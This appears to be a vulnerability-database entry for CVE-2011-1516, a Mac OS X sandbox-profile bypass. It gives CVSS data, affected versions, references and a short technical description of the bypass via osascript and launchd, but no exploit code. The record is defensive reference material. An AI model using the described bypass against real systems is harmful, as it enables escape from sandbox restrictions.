            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 4.9,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2018-10-09T19:31Z",
      "publishedDate": "2011-11-15T18:55Z"
    }
  }
}

FKIE_CVE-2011-1516

Vulnerability from fkie_nvd - Published: 2011-11-15 18:55 - Updated: 2025-04-11 00:51

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://www.coresecurity.com/content/apple-osx-sandbox-bypass	Exploit
cve@mitre.org	http://www.securityfocus.com/archive/1/520479/100/100/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.coresecurity.com/content/apple-osx-sandbox-bypass	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/520479/100/100/threaded

Impacted products

Vendor	Product	Version
apple	mac_os_x	10.5.0
apple	mac_os_x	10.5.1
apple	mac_os_x	10.5.2
apple	mac_os_x	10.5.3
apple	mac_os_x	10.5.4
apple	mac_os_x	10.5.5
apple	mac_os_x	10.5.6
apple	mac_os_x	10.5.7
apple	mac_os_x	10.5.8
apple	mac_os_x	10.6.0
apple	mac_os_x	10.6.1
apple	mac_os_x	10.6.2
apple	mac_os_x	10.6.3
apple	mac_os_x	10.6.4
apple	mac_os_x	10.6.5
apple	mac_os_x	10.6.6
apple	mac_os_x	10.6.7
apple	mac_os_x	10.6.8
apple	mac_os_x	10.7.0
apple	mac_os_x	10.7.1
apple	mac_os_x	10.7.2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC90AA12-DD17-4607-90CB-E342E83F20BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3F3E721C-00CA-4D51-B542-F2BC5C0D65BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3267A41-1AE0-48B8-BD1F-DEC8A212851A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "855288F1-0242-4951-AB3F-B7AF13E21CF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "10082781-B93E-4B84-94F2-FA9749B4D92B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE1EBF04-C440-4A6B-93F2-DC3A812728C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DFB077A2-927B-43AF-BFD5-0E78648C9394",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "2398ADC8-A106-462E-B9AE-F8AF800D0A3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "1335E35A-D381-4056-9E78-37BC6DF8AD98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C69DEE9-3FA5-408E-AD27-F5E7043F852A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D25D1FD3-C291-492C-83A7-0AFAFAADC98D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B565F77-C310-4B83-B098-22F9489C226C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "546EBFC8-79F0-42C2-9B9A-A76CA3F19470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "119C8089-8C98-472E-9E9C-1741AA21DD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "831C5105-6409-4743-8FB5-A91D8956202F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B63D169-E2AA-4315-891F-B4AF99F2753C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "1E715DFC-ADB8-43D0-9941-76BB0BE7BCF5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9D96EC5-8FFC-4C8D-9C3E-EFEE79D4D52C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8961F444-48C4-4B54-829B-A1A2D0F2716C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "09A0FA11-6211-4962-A6E0-F00732818012",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A36C17C-EBB3-4C42-9C75-6A7F2EE1F22C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303."
    },
    {
      "lang": "es",
      "value": "Los perfiles kSBXProfileNoNetwork y kSBXProfileNoInternet en Apple Mac OS X v10.5.x hasta v10.7.x no propagan las restricciones a todos los procesos creados, lo que permite a atacantes remotodos acceder a recursos de red a trav\u00e9s de una aplicaci\u00f3n modificada, como se demuestra con el uso de osascript para enviar eventos Apple al demonio launchd, una cuesti\u00f3n relacionada con CVE-2008-7303."
    }
  ],
  "id": "CVE-2011-1516",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.6,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-11-15T18:55:01.637",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/520479/100/100/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/520479/100/100/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2011-1516 (GCVE-0-2011-1516)

VAR-201111-0111

Parse the target options

Connect and send initialization packet

GHSA-VPRF-3XMV-J9FJ

GSD-2011-1516

FKIE_CVE-2011-1516

Tags

Sightings

Nomenclature